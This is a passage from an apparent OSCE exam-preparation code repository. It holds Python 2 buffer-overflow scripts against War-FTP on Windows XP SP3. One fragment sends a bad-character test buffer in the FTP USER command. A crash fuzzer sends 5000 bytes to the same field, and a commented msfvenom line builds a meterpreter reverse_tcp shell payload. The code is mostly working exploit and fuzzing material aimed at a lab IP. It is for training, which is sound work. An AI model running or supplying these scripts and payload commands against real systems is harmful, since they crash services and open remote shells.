"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 25 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 26 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 27 | 
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 28 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 29 | buffer += "D"*(1100-len(buffer)) 30 | 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | try: 33 | print "\nDestroy them with lazers..." 34 | s.connect(('172.16.73.129',21)) 35 | print s.recv(1500) 36 | s.send('USER ' + buffer + '\r\n') 37 | print s.recv(1500) 38 | s.send('PASS chanch@chanch.com\r\n') 39 | print s.recv(1500) 40 | s.close() 41 | print "\nFire in the hole! Go pick up the pieces!" 42 | except: 43 | print "ERROR! Shutting it dooooown.." 44 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/War-FTP_Server/war-ftpd-crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | War-FTP Server Exploit Fuzzer 10 | 1. python war-ftpd-crash.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | 18 | buffer = "A"*5000 19 | 20 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | try: 22 | print "\nDestroy them with lazers..." 23 | s.connect(('172.16.73.129',21)) 24 | print s.recv(1024) 25 | s.send('USER ' + buffer + '\r\n') 26 | print s.recv(1024) 27 | s.send('PASS anonymous\r\n') 28 | print s.recv(1024) 29 | s.close() 30 | print "\nFire in the hole! Go pick up the pieces!" 31 | except: 32 | print "ERROR! Shutting it dooooown.." 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCEPrep 2 | Code written while preparing for the OSCE certification 3 | --------------------------------------------------------------------------------